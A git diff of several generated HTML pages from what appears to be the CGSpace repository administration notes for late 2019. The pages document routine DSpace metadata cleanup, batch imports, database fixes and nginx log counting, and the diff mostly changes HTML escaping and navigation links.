&#34;Aranzales Rondón, Ericson&#34;,&#34;Ericson Aranzales Rondon: 0000-0001-7487-9909&#34;
&#34;Staiger-Rivas, Simone&#34;,&#34;Simone Staiger: 0000-0002-3539-0817&#34;
&#34;de Haan, Stef&#34;,&#34;Stef de Haan: 0000-0001-8690-1886&#34;
&#34;Pulleman, Mirjam&#34;,&#34;Mirjam Pulleman: 0000-0001-9950-0176&#34;
&#34;Abera, Wuletawu&#34;,&#34;Wuletawu Abera: 0000-0002-3657-5223&#34;
&#34;Tamene, Lulseged&#34;,&#34;Lulseged Tamene: 0000-0002-3806-8890&#34;
&#34;Andrieu, Nadine&#34;,&#34;Nadine Andrieu: 0000-0001-9558-9302&#34;
&#34;Ramírez-Villegas, Julián&#34;,&#34;Julian Ramirez-Villegas: 0000-0002-8044-583X&#34;
</code></pre><ul>
<li>I tested the file on my local development machine with the following invocation:</li>
</ul>
<pre><code>$ ./add-orcid-identifiers-csv.py -i 2019-09-19-ciat-orcids.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2019-09-19-ciat-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>In my test environment this added 390 ORCID identifier</li>
<li>I ran the same updates on CGSpace and DSpace Test and then started a Discovery re-index to force the search index to update</li>
@ -386,15 +386,15 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
<li>Follow up with Marissa again about the CCAFS phase II project tags</li>
<li>Generate a list of the top 1500 authors on CGSpace:</li>
</ul>
<pre><code>dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author') AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-09-19-top-1500-authors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = &#39;contributor&#39; AND qualifier = &#39;author&#39;) AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-09-19-top-1500-authors.csv WITH CSV HEADER;
</code></pre><ul>
<li>Then I used <code>csvcut</code> to select the column of author names, strip the header and quote characters, and saved the sorted file:</li>
</ul>
<pre><code>$ csvcut -c text_value /tmp/2019-09-19-top-1500-authors.csv | grep -v text_value | sed 's/&quot;//g' | sort &gt; dspace/config/controlled-vocabularies/dc-contributor-author.xml
<pre tabindex="0"><code>$ csvcut -c text_value /tmp/2019-09-19-top-1500-authors.csv | grep -v text_value | sed &#39;s/&#34;//g&#39; | sort &gt; dspace/config/controlled-vocabularies/dc-contributor-author.xml
</code></pre><ul>
<li>After adding the XML formatting back to the file I formatted it using XML tidy:</li>
</ul>
<pre><code>$ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/dc-contributor-author.xml
<pre tabindex="0"><code>$ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/dc-contributor-author.xml
</code></pre><ul>
<li>I created and merged <a href="https://github.com/ilri/DSpace/pull/433">a pull request for the updates</a>
<ul>
@ -416,7 +416,7 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
</ul>
</li>
</ul>
<pre><code>$ perl-rename -n 's/_{2,3}/_/g' *.pdf
<pre tabindex="0"><code>$ perl-rename -n &#39;s/_{2,3}/_/g&#39; *.pdf
</code></pre><ul>
<li>I was going preparing to run SAFBuilder for the Bioversity migration and decided to check the list of PDFs on my local machine versus on DSpace Test (where I had downloaded them last month)
<ul>
@ -426,25 +426,25 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
</ul>
</li>
</ul>
<pre><code>$ rename -v 's/___/_/g' *.pdf
$ rename -v 's/__/_/g' *.pdf
<pre tabindex="0"><code>$ rename -v &#39;s/___/_/g&#39; *.pdf
$ rename -v &#39;s/__/_/g&#39; *.pdf
</code></pre><ul>
<li>I&rsquo;m still waiting to hear what Carol and Francesca want to do with the <code>1195.pdf.LCK</code> file (for now I&rsquo;ve removed it from the CSV, but for future reference it has the number 630 in its permalink)</li>
<li>I wrote two fairly long GREL expressions to clean up the institutional author names in the <code>dc.contributor.author</code> and <code>dc.identifier.citation</code> fields using OpenRefine
<ul>
<li>The first targets acronyms in parentheses like &ldquo;International Livestock Research Institute (ILRI)&quot;:</li>
<li>The first targets acronyms in parentheses like &ldquo;International Livestock Research Institute (ILRI)&rdquo;:</li>
</ul>
</li>
</ul>
<pre><code>value.replace(/,? ?\((ANDES|APAFRI|APFORGEN|Canada|CFC|CGRFA|China|CacaoNet|CATAS|CDU|CIAT|CIRF|CIP|CIRNMA|COSUDE|Colombia|COA|COGENT|CTDT|Denmark|DfLP|DSE|ECPGR|ECOWAS|ECP\/GR|England|EUFORGEN|FAO|France|Francia|FFTC|Germany|GEF|GFU|GGCO|GRPI|italy|Italy|Italia|India|ICCO|ICAR|ICGR|ICRISAT|IDRC|INFOODS|IPGRI|IBPGR|ICARDA|ILRI|INIBAP|INBAR|IPK|ISG|IT|Japan|JIRCAS|Kenya|LI\-BIRD|Malaysia|NARC|NBPGR|Nepal|OOAS|RDA|RISBAP|Rome|ROPPA|SEARICE|Senegal|SGRP|Sweden|Syrian Arab Republic|The Netherlands|UNDP|UK|UNEP|UoB|UoM|United Kingdom|WAHO)\)/,&quot;&quot;)
<pre tabindex="0"><code>value.replace(/,? ?\((ANDES|APAFRI|APFORGEN|Canada|CFC|CGRFA|China|CacaoNet|CATAS|CDU|CIAT|CIRF|CIP|CIRNMA|COSUDE|Colombia|COA|COGENT|CTDT|Denmark|DfLP|DSE|ECPGR|ECOWAS|ECP\/GR|England|EUFORGEN|FAO|France|Francia|FFTC|Germany|GEF|GFU|GGCO|GRPI|italy|Italy|Italia|India|ICCO|ICAR|ICGR|ICRISAT|IDRC|INFOODS|IPGRI|IBPGR|ICARDA|ILRI|INIBAP|INBAR|IPK|ISG|IT|Japan|JIRCAS|Kenya|LI\-BIRD|Malaysia|NARC|NBPGR|Nepal|OOAS|RDA|RISBAP|Rome|ROPPA|SEARICE|Senegal|SGRP|Sweden|Syrian Arab Republic|The Netherlands|UNDP|UK|UNEP|UoB|UoM|United Kingdom|WAHO)\)/,&#34;&#34;)
</code></pre><ul>
<li>The second targets cities and countries after names like &ldquo;International Livestock Research Intstitute, Kenya&rdquo;:</li>
</ul>
<pre><code>replace(/,? ?(ali|Aleppo|Amsterdam|Beijing|Bonn|Burkina Faso|CN|Dakar|Gatersleben|London|Montpellier|Nairobi|New Delhi|Kaski|Kepong|Malaysia|Khumaltar|Lima|Ltpur|Ottawa|Patancheru|Peru|Pokhara|Rome|Uppsala|University of Mauritius|Tsukuba)/,&quot;&quot;)
<pre tabindex="0"><code>replace(/,? ?(ali|Aleppo|Amsterdam|Beijing|Bonn|Burkina Faso|CN|Dakar|Gatersleben|London|Montpellier|Nairobi|New Delhi|Kaski|Kepong|Malaysia|Khumaltar|Lima|Ltpur|Ottawa|Patancheru|Peru|Pokhara|Rome|Uppsala|University of Mauritius|Tsukuba)/,&#34;&#34;)
</code></pre><ul>
<li>I imported the 1,427 Bioversity records with bitstreams to a new collection called <a href="https://dspacetest.cgiar.org/handle/10568/103688">2019-09-20 Bioversity Migration Test</a> on DSpace Test (after splitting them in two batches of about 700 each):</li>
</ul>
<pre><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx768m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx768m&#39;
$ dspace import -a me@cgiar.org -m 2019-09-20-bioversity1.map -s /home/aorth/Bioversity/bioversity1
$ dspace import -a me@cgiar.org -m 2019-09-20-bioversity2.map -s /home/aorth/Bioversity/bioversity2
</code></pre><ul>
@ -513,7 +513,7 @@ $ dspace import -a me@cgiar.org -m 2019-09-20-bioversity2.map -s /home/aorth/Bio
</li>
<li>Get a list of institutions from CCAFS&rsquo;s Clarisa API and try to parse it with <code>jq</code>, do some small cleanups and add a header in <code>sed</code>, and then pass it through <code>csvcut</code> to add line numbers:</li>
</ul>
<pre><code>$ cat ~/Downloads/institutions.json| jq '.[] | {name: .name}' | grep name | awk -F: '{print $2}' | sed -e 's/&quot;//g' -e 's/^ //' -e '1iname' | csvcut -l | sed '1s/line_number/id/' &gt; /tmp/clarisa-institutions.csv
<pre tabindex="0"><code>$ cat ~/Downloads/institutions.json| jq &#39;.[] | {name: .name}&#39; | grep name | awk -F: &#39;{print $2}&#39; | sed -e &#39;s/&#34;//g&#39; -e &#39;s/^ //&#39; -e &#39;1iname&#39; | csvcut -l | sed &#39;1s/line_number/id/&#39; &gt; /tmp/clarisa-institutions.csv
$ csv-metadata-quality -i /tmp/clarisa-institutions.csv -o /tmp/clarisa-institutions-cleaned.csv -u
</code></pre><ul>
<li>The csv-metadata-quality tool caught a few records with excessive spacing and unnecessary Unicode</li>
@ -581,15 +581,15 @@ $ csv-metadata-quality -i /tmp/clarisa-institutions.csv -o /tmp/clarisa-institut
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -7,7 +7,7 @@
<meta property="og:title" content="October, 2019" />
<meta property="og:description" content="2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U&#43;00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc." />
<meta property="og:description" content="2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U&#43;00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-10/" />
<meta property="article:published_time" content="2019-10-01T13:20:51+03:00" />
@ -17,8 +17,8 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="October, 2019"/>
<meta name="twitter:description" content="2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U&#43;00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc."/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="twitter:description" content="2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U&#43;00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc."/>
<meta name="generator" content="Hugo 0.133.1">
@ -48,12 +48,12 @@
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -99,7 +99,7 @@
<p class="blog-post-meta">
<time datetime="2019-10-01T13:20:51+03:00">Tue Oct 01, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -113,7 +113,7 @@
</ul>
</li>
</ul>
<pre><code>$ csvcut -c 'id,dc.title[en_US],cg.coverage.region[en_US],cg.coverage.subregion[en_US],cg.river.basin[en_US]' ~/Downloads/10568-16814.csv &gt; /tmp/iwmi-title-region-subregion-river.csv
<pre tabindex="0"><code>$ csvcut -c &#39;id,dc.title[en_US],cg.coverage.region[en_US],cg.coverage.subregion[en_US],cg.river.basin[en_US]&#39; ~/Downloads/10568-16814.csv &gt; /tmp/iwmi-title-region-subregion-river.csv
</code></pre><ul>
<li>Then I replace them in vim with <code>:% s/\%u00a0/ /g</code> because I can&rsquo;t figure out the correct sed syntax to do it directly from the pipe above</li>
<li>I uploaded those to CGSpace and then re-exported the metadata</li>
@ -121,7 +121,7 @@
<li>I modified the script so it replaces the non-breaking spaces instead of removing them</li>
<li>Then I ran the csv-metadata-quality script to do some general cleanups (though I temporarily commented out the whitespace fixes because it was too many thousands of rows):</li>
</ul>
<pre><code>$ csv-metadata-quality -i ~/Downloads/10568-16814.csv -o /tmp/iwmi.csv -x 'dc.date.issued,dc.date.issued[],dc.date.issued[en_US]' -u
<pre tabindex="0"><code>$ csv-metadata-quality -i ~/Downloads/10568-16814.csv -o /tmp/iwmi.csv -x &#39;dc.date.issued,dc.date.issued[],dc.date.issued[en_US]&#39; -u
</code></pre><ul>
<li>That fixed 153 items (unnecessary Unicode, duplicates, commaspace fixes, etc)</li>
<li>Release <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.3.1">version 0.3.1 of the csv-metadata-quality script</a> with the non-breaking spaces change</li>
@ -134,7 +134,7 @@
<ul>
<li>Create an account for Bioversity&rsquo;s ICT consultant Francesco on DSpace Test:</li>
</ul>
<pre><code>$ dspace user -a -m blah@mail.it -g Francesco -s Vernocchi -p 'fffff'
<pre tabindex="0"><code>$ dspace user -a -m blah@mail.it -g Francesco -s Vernocchi -p &#39;fffff&#39;
</code></pre><ul>
<li>Email Francesca and Carol to ask for follow up about the test upload I did on 2019-09-21
<ul>
@ -193,20 +193,20 @@
</ul>
</li>
</ul>
<pre><code>$ dspace user -a -m wow@me.com -g Felix -s Shaw -p 'fuananaaa'
<pre tabindex="0"><code>$ dspace user -a -m wow@me.com -g Felix -s Shaw -p &#39;fuananaaa&#39;
</code></pre><h2 id="2019-10-11">2019-10-11</h2>
<ul>
<li>I ran the DSpace cleanup function on CGSpace and it found some errors:</li>
</ul>
<pre><code>$ dspace cleanup -v
<pre tabindex="0"><code>$ dspace cleanup -v
...
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(171221) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(171221) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution, as always, is (repeat as many times as needed):</li>
</ul>
<pre><code># su - postgres
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (171221);'
<pre tabindex="0"><code># su - postgres
$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (171221);&#39;
UPDATE 1
</code></pre><h2 id="2019-10-12">2019-10-12</h2>
<ul>
@ -223,18 +223,18 @@ UPDATE 1
</ul>
</li>
</ul>
<pre><code>from,to
<pre tabindex="0"><code>from,to
CIAT,International Center for Tropical Agriculture
International Centre for Tropical Agriculture,International Center for Tropical Agriculture
International Maize and Wheat Improvement Center (CIMMYT),International Maize and Wheat Improvement Center
International Centre for Agricultural Research in the Dry Areas,International Center for Agricultural Research in the Dry Areas
International Maize and Wheat Improvement Centre,International Maize and Wheat Improvement Center
&quot;Agricultural Information Resource Centre, Kenya.&quot;,&quot;Agricultural Information Resource Centre, Kenya&quot;
&quot;Centre for Livestock and Agricultural Development, Cambodia&quot;,&quot;Centre for Livestock and Agriculture Development, Cambodia&quot;
&#34;Agricultural Information Resource Centre, Kenya.&#34;,&#34;Agricultural Information Resource Centre, Kenya&#34;
&#34;Centre for Livestock and Agricultural Development, Cambodia&#34;,&#34;Centre for Livestock and Agriculture Development, Cambodia&#34;
</code></pre><ul>
<li>Then I applied it with my <code>fix-metadata-values.py</code> script on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/affiliations.csv -db dspace -u dspace -p 'fuuu' -f from -m 211 -t to
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f from -m 211 -t to
</code></pre><ul>
<li>I did some manual curation of about 300 authors in OpenRefine in preparation for telling Peter and Abenet that the migration is almost ready
<ul>
@ -260,17 +260,17 @@ International Maize and Wheat Improvement Centre,International Maize and Wheat I
</ul>
</li>
</ul>
<pre><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 82m35.993s
</code></pre><ul>
<li>After the re-indexing the top authors still list the following:</li>
</ul>
<pre><code>Jagwe, J.|Ouma, E.A.|Brandes-van Dorresteijn, D.|Kawuma, Brian|Smith, J.
<pre tabindex="0"><code>Jagwe, J.|Ouma, E.A.|Brandes-van Dorresteijn, D.|Kawuma, Brian|Smith, J.
</code></pre><ul>
<li>I looked in the database to find authors that had &ldquo;|&rdquo; in them:</li>
</ul>
<pre><code>dspace=# SELECT text_value, resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value LIKE '%|%';
<pre tabindex="0"><code>dspace=# SELECT text_value, resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value LIKE &#39;%|%&#39;;
text_value | resource_id
----------------------------------+-------------
Anandajayasekeram, P.|Puskur, R. | 157
@ -280,7 +280,7 @@ real 82m35.993s
</code></pre><ul>
<li>Then I found their handles and corrected them, for example:</li>
</ul>
<pre><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '157' and handle.resource_type_id=2;
<pre tabindex="0"><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = &#39;157&#39; and handle.resource_type_id=2;
handle
-----------
10568/129
@ -304,20 +304,20 @@ real 82m35.993s
</ul>
</li>
</ul>
<pre><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx512m&#39;
$ mkdir 2019-10-15-Bioversity
$ dspace export -i 10568/108684 -t COLLECTION -m -n 0 -d 2019-10-15-Bioversity
$ sed -i '/&lt;dcvalue element=&quot;identifier&quot; qualifier=&quot;uri&quot;&gt;/d' 2019-10-15-Bioversity/*/dublin_core.xml
$ sed -i &#39;/&lt;dcvalue element=&#34;identifier&#34; qualifier=&#34;uri&#34;&gt;/d&#39; 2019-10-15-Bioversity/*/dublin_core.xml
</code></pre><ul>
<li>It&rsquo;s really stupid, but for some reason the handles are included even though I specified the <code>-m</code> option, so after the export I removed the <code>dc.identifier.uri</code> metadata values from the items</li>
<li>Then I imported a test subset of them in my local test environment:</li>
</ul>
<pre><code>$ ~/dspace/bin/dspace import -a -c 10568/104049 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map -s /tmp/2019-10-15-Bioversity
<pre tabindex="0"><code>$ ~/dspace/bin/dspace import -a -c 10568/104049 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map -s /tmp/2019-10-15-Bioversity
</code></pre><ul>
<li>I had forgotten (again) that the <code>dspace export</code> command doesn&rsquo;t preserve collection ownership or mappings, so I will have to create a temporary collection on CGSpace to import these to, then do the mappings again after import&hellip;</li>
<li>On CGSpace I will increase the RAM of the command line Java process for good luck before import&hellip;</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ dspace import -a -c 10568/104057 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map -s 2019-10-15-Bioversity
</code></pre><ul>
<li>After importing the 1,367 items I re-exported the metadata, changed the owning collections to those based on their type, then re-imported them</li>
@ -385,15 +385,15 @@ $ dspace import -a -c 10568/104057 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -15,17 +15,17 @@ I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 milli
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
1277694
So 4.6 million from XMLUI and another 1.2 million from API requests
Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
" />
<meta property="og:type" content="article" />
@ -45,20 +45,20 @@ I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 milli
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
1277694
So 4.6 million from XMLUI and another 1.2 million from API requests
Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -88,12 +88,12 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -139,7 +139,7 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
<p class="blog-post-meta">
<time datetime="2019-11-04T12:20:30+02:00">Mon Nov 04, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -152,22 +152,22 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
</ul>
</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
1277694
</code></pre><ul>
<li>So 4.6 million from XMLUI and another 1.2 million from API requests</li>
<li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li>
</ul>
<pre><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
</code></pre><ul>
<li>The types of requests in the access logs are (by lazily extracting the sixth field in the nginx log)</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | awk '{print $6}' | sed 's/&quot;//' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | awk &#39;{print $6}&#39; | sed &#39;s/&#34;//&#39; | sort | uniq -c | sort -n
1 PUT
8 PROPFIND
283 OPTIONS
@ -177,31 +177,31 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
</code></pre><ul>
<li>Two very active IPs are 34.224.4.16 and 34.234.204.152, which made over 360,000 requests in October:</li>
</ul>
